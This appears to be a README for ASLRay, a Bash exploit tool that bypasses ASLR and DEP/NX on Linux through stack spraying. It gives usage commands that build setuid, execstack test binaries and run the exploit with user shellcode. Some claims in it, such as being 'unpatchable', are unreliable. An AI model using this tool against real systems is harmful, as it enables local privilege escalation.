ASLRay is a Linux ELF x32/x64 ASLR DEP/NX bypass exploit with stack-spraying.
Properties:
+ ASLR bypass
+ DEP/NX bypass
+ Cross-platform
+ Minimalistic
+ Simplicity
+ Unpatchable
Dependencies:
– Linux 2.6.12+ – would work on any x86-64 Linux-based OS
– BASH – the whole script
Limitations:
+ Stack needs to be executable (-z execstack) for x64
+ Binary has to be exploited through arguments locally (not file, socket or input)
+ No support for other architectures and OSes (TODO)
+ Need to know the buffer limit/size
How it works?
You might have heard of Heap Spraying attack? Well, Stack Spraying is similar, however, it was considered unpractical for most cases, especially ASLR on x86-64.
– For 32-bit, there are 2^32 (4 294 967 296) theoretical addresses, nevertheless, the kernel will allow to control about only half of bits (2^(32/2) = 65 536) for an execution in a virtualized memory, which means that if we control more that 50 000 characters in stack, we are almost sure to point to our shellcode, regardless the address, thanks to kernel redirection and retranslation. According to my tests, even 100 or 10 characters are enough.
– This can be achieved using shell variables, which aren’t really limited to a specific length, but practical limit is about one hundrer thousand, otherwise it will saturate the TTY.
Usage:
git clone https://github.com/cryptolok/ASLRay && cd ASLRay apt install gcc libc6-dev-i386 || kill -9 $$ chmod u+x ASLRay.sh sudo gcc -z execstack test.c -o test sudo gcc -m32 -z execstack test.c -o test32 sudo chmod +s test test32 source ASLRay.sh test32 1024 source ASLRay.sh test 1024 source ASLRay.sh test 1024 \x31\x80...your_shellcode_here sudo gcc -m32 test.c -o test32x sudo chmod +s test test32 source ASLRay.sh test32x 1024 For Arch/Ubuntu: sudo gcc -z execstack -fno-stack-protector test.c -o test sudo gcc -m32 -z execstack -fno-stack-protector test.c -o test32 sudo gcc -m32 -fno-stack-protector test.c -o test32x
Source: https://github.com/cryptolok
